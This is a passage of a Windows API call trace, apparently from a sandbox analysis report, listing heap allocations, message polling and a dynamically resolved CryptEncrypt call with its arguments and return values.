dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0190.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0190.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0190.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0190.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0190.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0190.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0190.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0190.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0190.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0190.515] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0190.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0190.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0190.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0190.515] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0190.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0190.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0190.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0190.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0190.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0190.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0190.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0190.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0190.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0190.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0190.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0190.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0190.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0190.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0190.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0190.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0190.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0190.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0190.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0190.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0190.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0190.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0190.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0190.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0190.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0190.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0190.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0190.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0190.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0190.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0190.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0190.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1188020 [0190.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0190.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1188020 | out: hHeap=0x970000) returned 1 [0190.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0190.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0190.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0190.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0190.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0190.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0190.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0190.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0190.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0190.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0190.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0190.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0190.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0190.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0190.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0190.544] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0190.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0190.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0190.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0190.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0190.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0190.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0190.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0190.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0190.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0190.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0190.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0190.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0190.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0190.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0190.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0190.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0190.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0190.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0190.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0190.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0190.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0190.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0190.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0190.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0190.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0190.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0190.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0190.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0190.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0190.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0190.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0190.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0190.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0190.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0190.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0190.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0190.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0190.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0190.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0190.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0190.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0190.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0190.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0190.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0190.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0190.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0190.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0190.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0190.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0190.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0190.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0190.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0190.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0190.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0190.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0190.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0190.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0190.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0190.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0190.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0190.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0190.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0190.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0190.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0190.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0190.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0190.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0190.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0190.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0190.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0190.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0190.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0190.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0190.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0190.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0190.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0190.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ae8 [0190.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ae8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0190.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0190.586] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0190.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0190.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0190.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54350 [0190.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0190.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0190.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0190.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0190.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0190.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0190.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0190.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0190.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0190.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0190.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0190.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0190.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0190.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0190.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0190.587] CryptEncrypt (in: hKey=0xa86f50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0190.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0190.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0190.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0190.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0190.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0190.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0190.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0190.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0190.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0190.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0190.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: 